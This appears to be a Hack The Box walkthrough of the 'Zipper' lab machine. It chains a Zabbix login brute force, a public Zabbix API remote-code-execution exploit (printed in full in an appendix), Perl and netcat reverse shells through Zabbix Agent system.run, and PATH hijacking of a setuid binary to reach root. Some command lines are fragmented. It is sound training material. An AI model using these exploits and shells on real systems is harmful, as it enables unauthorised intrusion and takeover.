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18​th​ February 2019 / Document No D19.100.08

Prepared By: egre55
Machine Author: burmat
Difficulty: ​Medium
Classification: Official

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Zipper is a medium difficulty machine that highlights how privileged API access can be leveraged
to gain RCE, and the risk of unauthenticated agent access. It also provides an interesting
challenge in terms of overcoming command processing timeouts, and also highlights the dangers
of not specifying absolute paths in privileged admin scripts/binaries.

Skills Required Skills Learned

● Basic knowledge of Linux ● Zabbix API enumeration

● Basic knowledge of Web enumeration ● Exploit modification
tools ● Zabbix Agent command execution
● Overcoming reverse shell
● Relative path hijacking

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masscan -p1-65535,U:1-65535 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports

ports=$(cat ports | awk -F ​" "​ ​'{print $4}'​ | awk -F ​"/"​ ​'{print $1}'​ | sort -n | tr ​'\n'
','​ | sed ​'s/,$//'​)
nmap -Pn -sV -sC -p​$ports​

SSH and an Apache httpd 2.4.29 web server are available. Port 10050 is also listed, which
according to the Internet Assigned Numbers Authority (IANA), is associated with the Zabbix
Agent. Zabbix is an open-source monitoring software tool that is cable of monitoring a range of
networks, devices and services.


Visiting confirms that Zabbix is installed.

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Attempting a log in with the default credentials ​admin:zabbix​ is unsuccessful. After clicking
"sign in as guest", the Zabbix console is visible. The user "zapper" on host "zabbix" is referenced.
The version of Zabbix is 3.0.

Admin account

Patator is used in an online brute force attack, in an attempt to reveal the password for "zapper".
Unsuccessful logins result in the error: "Login name or password is incorrect.", and patator is
configured to ignore responses with this text. The SecLists "darkweb2017-top1000.txt" wordlist is
used. It is quite common for accounts (web, service accounts etc.) to have the password set as
the username, and so "zapper" is added to the top of the wordlist.

$ git ​clone​ https://github.com/danielmiessler/SecLists

$ patator http_fuzz url= method=POST
0=/usr/share/SecLists/Passwords/darkweb2017-top1000.txt accept_cookie=1 follow=1
-x ignore:fgrep=​'Login name or password is incorrect.'

The password "zapper" has been found.

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However, this account doesn’t have access to the GUI.

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It seems that Zabbix has an API, and the documentation provides example JSON for interacting
with it.


The user authentication token is requested:

$ curl -i -X POST -H ​'Content-type:application/json'​ -d



The host names and interfaces are then requested.

$ curl -i -X POST -H ​'Content-type:application/json'​ -d

'{"jsonrpc":"2.0","method":"host.get","params":{ "output":


SearchSploit contains an exploit created by Alexander Gurin, which leverages the Zabbix API to
achieve RCE.

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The exploit is copied/downloaded, and the Zabbix root, hostid, login and password are entered
(see ​Appendix A​).


The exploit works very well, and the presence of ".dockerenv" reveals that the foothold is within a
Docker container.

In order to upgrade to a proper shell, the following Perl "one-liner" is issued.

$ python zabbix_api_pwn.py

[zabbix_cmd]>>: perl -e ​'use

en(STDERR,">&S");exec("/bin/sh -i");};'​ &

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$ SHELL=/bin/bash script -q /dev/null
$ CTRL + Z
$ stty raw -​echo
$ ​fg
$ reset
$ xterm
$ ​export​ TERM=xterm

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Lateral Movement

The Zabbix server configuration file is examined and SQLite database credentials are discovered.

$ cat /etc/zabbix/zabbix_server.conf

The Docker IP address is and default gateway is The Zabbix Agent (port
10050) is accessible on

According to the Zabbix documentation, it is possible to execute system commands on remote

agent endpoints using the Zabbix Agent "system.run" command.

Source: ​https://www.zabbix.com/documentation/3.4/manual/config/items/itemtypes/zabbix_agent

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The output of "ls -al" reveals that that the directory "/backups" is available on both the container
and host, which indicates that a shared folder has been configured. Indeed, files created here on
the Docker container are confirmed accessible from the host.

​ cho​ system.run[ cat /etc/hosts ] | nc 10050

$ e
$ e​ cho​ system.run[ id ] | nc 10050
$ e ​ cho​ system.run[ ls -al / ] | nc 10050

A reverse shell would make the job of post-exploitation on much easier. By default,
Zabbix Agent tasks will time out after 3 seconds, meaning that the shell will effectively die on
arrival. To work around this limitation, a command is piped into the waiting listener, so that the
reverse shell spawns another shell immediately upon arrival, which remains intact.

The file "​/backups/shell.pl​" is created with the following Perl reverse shell:

pen(STDERR,​">&S"​);​exec​(​"/bin/sh -i"​);};

The listeners are stood up:

​ rintf​ ​"perl /backups/shell.pl\n"​ | nc -lvp 8443

$ p
$ nc -lvnp 8444

Finally, the Agent task is executed:

$ ​echo​ ​"system.run[ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8443 >/tmp/f & ]"​ | nc 10050

A reverse shell is received as zabbix on zipper (, which is immediately upgraded.

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Privilege Escalation

The "zabbix-service" setuid binary is identified, which provides the ability to start and stop the
zabbix-agent service. The service name is discovered after examining the binary with the
"strings" utility.

$ find / -perm -4000 2>/dev/null

$ strings /home/zapper/utils/zabbix-service

The absolute path to systemctl has not been used. By creating a malicious "systemctl" and
making its location the first PATH entry, command execution can be hijacked.

The malicious "systemctl" is created with a Perl reverse shell as contents.

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​ d​ /var/tmp
$ c
$ pico systemctl
$ chmod +x systemctl

perl -e 'use
STDERR,">&S");exec("/bin/sh -i");};'

The location "/var/tmp" is made the first PATH entry, the zabbix-service binary is run and service

$ ​echo​ ​$PATH
$ ​export​ PATH=$(​pwd​):​$PATH
$ ​echo​ ​$PATH
$ /home/zapper/utils/zabbix-service

A reverse shell running as root is received and the user and root flags can be captured.

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Appendix A

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Exploit Title: Zabbix RCE with API JSON-RPC

# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A

import​ requests
import​ json
import​ readline

ZABIX_ROOT = ​'' ### Zabbix IP-address

url = ZABIX_ROOT + ​'/api_jsonrpc.php' ### Don't edit

login = ​'zapper' ### Zabbix login

password = ​'zapper' ### Zabbix password
hostid = ​'10105' ### Zabbix hostid

### auth
payload = {
"jsonrpc"​ : ​"2.0"​,
​"method"​ : ​"user.login"​,
​"params"​: {
'user'​: ​""​+login+​""​,
'password'​: ​""​+password+​""​,
"auth"​ : ​None​,
​"id"​ : ​0​,

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headers = {
​'content-type'​: ​'application/json'​,

auth = requests.post(url, data=json.dumps(payload), headers=(headers))

auth = auth.json()

​ rue​:
while​ T
cmd = raw_input(​'\033[41m[zabbix_cmd]>>: \033[0m '​)
if​ cmd == ​""​ : ​print​ ​"Result of last command:"
if​ cmd == ​"quit"​ : ​break

### update
payload = {
"jsonrpc"​: ​"2.0"​,
"method"​: ​"script.update"​,
"params"​: {
​"scriptid"​: ​"1"​,
​"command"​: ​""​+cmd+​""
"auth"​ : auth[​'result'​],
"id"​ : ​0​,

cmd_upd = requests.post(url, data=json.dumps(payload),


### execute
payload = {
"jsonrpc"​: ​"2.0"​,
"method"​: ​"script.execute"​,
"params"​: {
​"scriptid"​: ​"1"​,
​"hostid"​: ​""​+hostid+​""
"auth"​ : auth[​'result'​],
"id"​ : ​0​,

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cmd_exe = requests.post(url, data=json.dumps(payload),
cmd_exe = cmd_exe.json()
print​ cmd_exe[​"result"​][​"value"​]

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